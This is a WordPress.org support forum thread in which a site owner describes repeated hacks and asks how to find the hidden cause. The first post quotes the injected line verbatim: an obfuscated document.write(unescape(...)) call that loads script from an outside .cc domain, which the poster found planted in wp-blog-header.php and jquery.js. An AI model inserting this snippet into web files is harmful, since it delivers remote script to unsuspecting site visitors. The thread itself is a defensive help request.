WordPress.org

Ready to get started?Download WordPress

Forums

Site constantly hacked (3 posts)

  1. liquidcool
    Member
    Posted 3 years ago #

    For a while now, a WordPress site I host has been continually hacked. All the other blogs I host are untouched, it's just the one in top level. I keep fixing it and doing more to harden my installation, but it doesn't seem to stop them - every couple days it's hacked again. The hack is simple and consistent; they add a line like this to my wp-blog-header.php:

    document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6A%73%2D%6F%2D%61%68%63%77%2E%63%7A%2E%63%63%2F%31%31%22%3E%3C%2F%73%63%72%69%70%74%3E'));

    Sometimes it ends up elsewhere, most recently jquery.js. It's always taking visitors to some .cc domain.

    I've done everything I can to keep the site secure:

    - Ultimate Security Checker and Bulletproof Security (hardened .htaccess files) plugins installed and configured
    - WP and plugins kept up to date
    unused plugins and themes deleted
    - FTP password secured with KeePass and stored nowhere else (no program (FileZilla, etc) is allowed to "remember" it).
    - WP admin account has no privileges, real admin account under a different user
    - file permissions as recommended

    Yet every couple days the site is hacked in the same way. What else can I do to stop this? My hunch is that it's a rogue PHP file. I've downloaded my install and done diffs, but I'm wondering if it's hiding in wp-content since it's publicly accessible and is never deleted. Maybe hiding in cache? How can I check for that?

    Thanks!

  2. Samuel B
    moderator
    Posted 3 years ago #

  3. liquidcool
    Member
    Posted 3 years ago #

    Thanks. After reading that, I downloaded a copy of my files and used diff to compare them with the latest WP. Found a few extra files, but nothing looked too suspicious. Still, they're gone now. Of course, that doesn't include wp-content.

    I think the biggest potential danger there is the cache directory, which I note is not in the current WP. I thought it was active, but I just noticed its modification time was 6/09, so I've deleted it. Hopefully the culprit was hiding somewhere in there. If not, I guess I'll delete and re-add all my plugins. Hope this helps someone.

Topic Closed

This topic has been closed to new replies.

About this Topic